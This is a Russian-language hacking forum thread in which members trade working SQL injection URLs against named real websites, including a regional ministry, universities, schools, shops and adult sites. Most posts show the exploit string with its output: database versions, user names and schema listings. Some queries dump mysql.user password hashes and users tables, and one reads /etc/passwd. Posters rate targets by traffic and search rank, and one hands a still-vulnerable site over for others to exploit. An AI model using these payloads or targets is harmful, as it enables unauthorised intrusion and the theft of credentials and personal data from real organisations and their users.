SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    http://www.meteonova.ru/search/index.htm?req=liststates&stfrom=1101&stto=-1110+UNION+select+1,cast(concat_ws(0x3a,user,host,password)+as+binary),3,4,5+from+mysql.user+--+
    root@localhost
    ТИЦ 700
    PR 5
    трафф - 10к
     
    1 person likes this.
  2. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    ТЕЛЕФОННЫЙ СПРАВОЧНИК
    МИНИСТЕРСТВА СОЦИАЛЬНОЙ ЗАЩИТЫ НАСЕЛЕНИЯ АМУРСКОЙ ОБЛАСТИ

    Code:
    http://[B][COLOR=Red]help.amurobl.ru[/COLOR][/B]/tel/index.php?id=1[B][COLOR=YellowGreen]+and+1=0+union+select+1,2,group_concat(column_name+separator+0x3a),4,5,6,7,8,9,10,1,12,13+from+information_schema.columns+where+table_name=0x7573657273--+[/b][/COLOR]
    
    5.1.56 / [email protected]
    Code:
    [B][U]Database[/U][/B]: [B][COLOR=YellowGreen]mszn[/COLOR][/B]
     
    #15002 mix0x0, 20 Jun 2012
    Last edited by a moderator: 21 Jun 2012
    3 people like this.
  3. Darth Padla

    Darth Padla Member

    Joined:
    21 Jun 2010
    Messages:
    141
    Likes Received:
    25
    Reputations:
    8
    PHP:
    http://www.toydorks.com/displayproduct.php?item=-1+union+select+1,2,3,group_concat(table_name+separator+0x3C62723E),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
    PR: 4
    канада,игрушки

    PHP:
    http://www.hitchedmag.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat(table_name,0x3a,column_name+separator+0x3C62723E),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+information_schema.columns+--+
    PR:3

    Code:
    http://www.readingmatters.co.uk/book2.php?id=1111111111111111+union+select+1,2,3,4,5,6,7,group_concat(table_name,0x3a,column_name+separator+0x3C62723E),9+from+information_schema.columns+--+
    CY:10 PR:5
    имеется таблица wp_users в базе readingmatters-wp,но я туда не смог добраться почему-то

    Code:
    http://www.hondashowoff.com/profile.php?id=-1+union+select+user_password+from+users+--+
    Blind sql
    CY:10 PR:3

    Code:
    http://www.greenenaftaligallery.com/artist.php?id=-1+union+select+1,version(),user(),4,5,6,7+--+
    PR:5

    Code:
    http://www.benayoun.com/projet.php?id=-1+union+select+version()/*+
    PR:5
     
    #15003 Darth Padla, 21 Jun 2012
    Last edited: 22 Jun 2012
    2 people like this.
  4. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    jazzcorner.com PR-6
    Code:
    www.jazzcorner.com/news/display.php?news=-2060+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16+--+
    Code:
    5.0.95-community:[email protected]:jazzcorn_main
    leavenworth.org PR-5
    Code:
    www.leavenworth.org/modules/event/events.php?pageid=26'+and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,version(),user(),database())),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'QceT'='QceT--&path=26&print=true
    Code:
    5.0.45:LCC_ChamberR@localhost:lcc1
    localcrimenews.com PR-5
    Code:
    www.localcrimenews.com/lookup.php?uid=99999&jid=-6975733+UnIon+selECt+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+--+&refid=1950&cname=Gilroy
    Code:
    5.1.63-cll:theur_cacrime@localhost:theur_cacrime
     
    2 people like this.
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    [email protected]:5.0.51a-log:antique
    [email protected]:5.5.15-log:u329879_bitmafua
    rbc@localhost:5.1.29-rc-log:rbc
     
    _________________________
    1 person likes this.
  6. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Возобновляемые источники энергии и энергоэффективность.

    Code:
    http://www.reeep.org/index.php?id=9353&text=&special=viewitem&cid=1-1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
    Database Version: 5.0.22-Debian_0ubuntu6.06.5-log
    Database name: conx26_reeep
    User name: [email protected]

    ТИЦ: 10
    PR: 6


    Говнобложек.

    Code:
    http://www.getoutthere.info/blog.php?id=1-1+UNION+SELECT+1,2,3,4,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),6,7,8,9,10,11,12,13,14--
    
    Database Version: 5.0.86
    Database name: getoutthere
    User name: posactivities@localhost

    ТИЦ: 0
    PR: 3


    Кофейный магазин.

    Code:
    http://www.freshcup.com/featured-article.php?id=1-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),4,5,6,7--
    Database Version: 5.0.77-log
    Database name: 417980_freshcup
    User name: [email protected]

    ТИЦ: 10
    PR: 5


    Магазин виниловых-наклеек.

    Code:
    http://www.33dodo.ru/goods.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),36,37--
    Database Version: 5.0.92-log
    Database name: dodo6909_33dodoru
    User name: dodo6909_33dodor@localhost

    ТИЦ: 60
    PR: 3


    Профессиональное звуковое и световое оборудование.

    Code:
    http://www.sstrade.ru/goods.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71)--
    Database Version: 4.1.25
    Database name: test
    User name: root@localhost

    ТИЦ: 20
    PR: 2


    Генетика и магазин реагентов.

    Code:
    http://imgenex.com/view_data_page.php?id=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7--
    Database Version: 5.0.77
    Database name: ssingh_plpdb
    User name: root@localhost

    ТИЦ: 20
    PR: 5
     
    #15006 HellFire, 23 Jun 2012
    Last edited: 23 Jun 2012
    3 people like this.
  7. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://www.esoterica.ru/catalog.php?c=1&b=-22%20and%201=2%20union%20select%20aes_decrypt(aes_encrypt(concat_ws(0x3a,@@version,user(),database()),0x71),0x71)+--

    4.1.13a-nt-max-log [email protected] gb_esoterica
     
  8. Skofield

    Skofield Elder - Старейшина

    Joined:
    27 Aug 2008
    Messages:
    960
    Likes Received:
    392
    Reputations:
    58
    Code:
    http://sites.upc.[B][SIZE=3][COLOR=Lime]edu[/COLOR][/SIZE][/B]/aaupc/index.php?option=com_content&task=view&id=474&idpag=301&Itemid=157&ID=3344+or+(@:=1)||@+group+by+concat((select+substr(concat_ws(0x3a,user,pwd),1,100)+from+users+limit+0,1),@:=@-1)having+@||min(@:=0)--+
    Database Version: 5.0.32-Dotdeb_1.dotdeb.1-log
    Database name: aaupc
    User name: [email protected]
    Code:
    http://sites.upc.edu/~w-unesco/angles/noticia.php?id=-62+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,0,11,12,13,14+from+information_schema.tables--
    Database name: w-unesco
    User name: w-unesco@localhost
     
    4 people like this.
  9. Zed0x

    Zed0x Member

    Joined:
    4 Jun 2012
    Messages:
    114
    Likes Received:
    29
    Reputations:
    23
    SITE: top.ryazan.ru
    DB: bukan192_toprzn
    MySQL version: 5.1.63
    MySQL user: bukan192_btoprzn

    Скрин сайта:
    [​IMG]

    Информация о сайте:
    тИЦ: 90
    Google PageRank: 3
    Users: >4000
    IP сайта: 92.63.107.233
    Страниц в Google: 6090
    Веб-сервер: nginx (1.2.1)
    Хостинг сайта: webdc.ru

    ____________________________________________________________
    Инъекция:
    Вывод на страницу: 5,6,12,14
     
    #15009 Zed0x, 25 Jun 2012
    Last edited: 25 Jun 2012
    2 people like this.
  10. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    PHP:
    http://www.tesar[dot]ru/faq/?func=show_answer&f_id=1-1+union+all+select+1,concat_ws(0x3a,user(),database(),version()),3--+
    User: tesar@localhost
    Database: tesar
    Version: 5.0.92


    PR - 3
    CY - 170

    PHP:
    http://www.edimax[dot]ru/ru/events_detail.php?e_id=1-1+union+all+select+1,2,3,4,user(),file_priv,7,8+from+mysql.user+where+user=0x726f6f74--+
    User: [email protected]
    Database: edimaxc_ua
    Version: 5.0.96
    File_priv: Y


    PR - 5
    CY - 160
     
    3 people like this.
  11. Sidarovich1975

    Joined:
    4 Oct 2009
    Messages:
    60
    Likes Received:
    16
    Reputations:
    7
    EDU, pr-4 :
    PHP:
    http://student.bard.edu/clubs/templates/template2.php?id=-1201'+union+select+concat_ws(CHAR(32,58,32),user(),version(),database())+--+
    Результат в сорцах:
     
    2 people like this.
  12. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    ТИЦ == 10, PR == 4;

    PHP:
    http://www.kenston.k12.oh.us/khs/kenston.high.school.photo.gallery.php?id=1041'+and+(select+1+from(select+count(*),concat(database(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+h
     
    4 people like this.
  13. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    lizaalert.org/article.asp?sf=4&sfp=13&id=4++UNION+SELECT+1,2,3,4,5,6,concat(user(),version(),database()),8,9,10,11,12,13,14+LIMIT+1,1--
    [email protected]

    soft-ufa.ru/?type=page&method=show&id=4++UNION+SELECT+1,concat(user(),version(),database()),3+limit+1,1--
    [email protected]_soft
     
    1 person likes this.
  14. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    98
    Likes Received:
    78
    Reputations:
    40
    Cайт посвящённый косплею.

    Code:
    http://www.cosplace.net/coscraft.php?id=1488-666+UNION+SELECT+1,2,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),4,5,6,7,8--
    Database Version: 5.0.67-percona-highperf-b7-log
    Database name: cosplace
    User name: cosplace@localhost

    ТИЦ: 10
    PR: 2


    Институт вычислительных технологий СО РАН.

    Вывод результата в названии файла.

    Т.к. кол-во символов в названии файла режется - пишу по частям:

    Code:
    http://www.ict.nsc.ru/jct/getfile.php?id=1-1.1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(Version())-- 
    Code:
    http://www.ict.nsc.ru/jct/getfile.php?id=1-1.1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(Database())--
    Code:
    http://www.ict.nsc.ru/jct/getfile.php?id=1-1.1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT(User())--
    Database Version: 4.0.17
    Database name: jct
    User name: [email protected]

    ТИЦ: 1800
    PR: 6
     
    #15014 HellFire, 27 Jun 2012
    Last edited: 28 Jun 2012
    1 person likes this.
  15. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    TИЦ == 10, PR == 2;

    PHP:
    http://www.victoriya-security.ru/eng/consultation.php?id=-28'+union+select+1,group_concat(table_name),3,4,5,6,7,8,9+from+information_schema.tables--+h
    TИЦ == 10, PR == 2;

    PHP:
    http://abkteh.ru/videonabludenie/?vid=-10+union+select+1,2,concat_ws(0x03a,login,password,status),4,5,6,7,8,9+from+users+limit+1,1--
     
  16. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    BEEG.COM - порнушный трафик-холдер

    Яндекс тИЦ: 10
    Google Page Rank: 4
    Доля интеренет трафа: 0.2% - 5-12 миллионов посетителей в день :)

    Выжал за 3 месяца на полную, но скуля осталась. Забирайте.

    Error Based XPATH SQLi
    Уязвимое поле: GET

     
    #15016 \/ITA, 28 Jun 2012
    Last edited: 28 Jun 2012
    4 people like this.
  17. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    www.plugrush.com - еще один порнушный трафик-холдер :)

    Google Page Rank: 2
    Доля интернет: 0.03% - 1-2 миллиона посетителей в день (возможно намного больше)

    Не добился успеха. Сложная соль, неизвестна админка.

    Error Based Duplicate entry SQLi
    Уязвимое поле: REFERER

    viesearch.com - поисковик

    Яндекс тИЦ: 10
    Google Page Rank: 4
    Доля интеренет: 0.015%

    Мало трафа, бросил.

    Error Based Duplicate column SQLi

    Уязвимое поле: GET

     
    #15017 \/ITA, 28 Jun 2012
    Last edited: 28 Jun 2012
    3 people like this.
  18. Lam3rsha

    Lam3rsha Member

    Joined:
    25 Oct 2008
    Messages:
    36
    Likes Received:
    8
    Reputations:
    5
    http://www.delreyhotel.com/dining.php?ids=6+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2

    Database Version: 5.0.95-community
    Database name: delrey_delreybd
    User name: delrey_delrey@localhost
     
    1 person likes this.
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Xsqlinjbegin5.0.95-community/**/delrey_delreybd/**/delrey_delrey@localhostxsqlinjend
    Что за бред?
    Не легче 0x3a или 0x3c62723e ?
     
    _________________________
  20. Sidarovich1975

    Joined:
    4 Oct 2009
    Messages:
    60
    Likes Received:
    16
    Reputations:
    7
    EDU в магадан :)

    EDU с базой, в т.ч. е-маил..., ничего не фильтруется, mysql-user - root!! советую поковыряться во всех базах... их там много...

    user:database:version
    PHP:
    http://digilib.stikom.edu/detil.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+user+--+
    name,password
    PHP:
    http://digilib.stikom.edu/detil.php?id=-9+union+select+1,2,3,4,5,6,7,8,UID,Passwd,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+user+--+
    кавычки не фильтруются, File_priv=Y =>
    load_file
    PHP:
    http://digilib.stikom.edu/detil.php?id=-9+union+select+1,2,3,4,5,6,7,8,load_file('/etc/passwd'),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+from+user+--+
     
    2 people like this.
Thread Status:
Not open for further replies.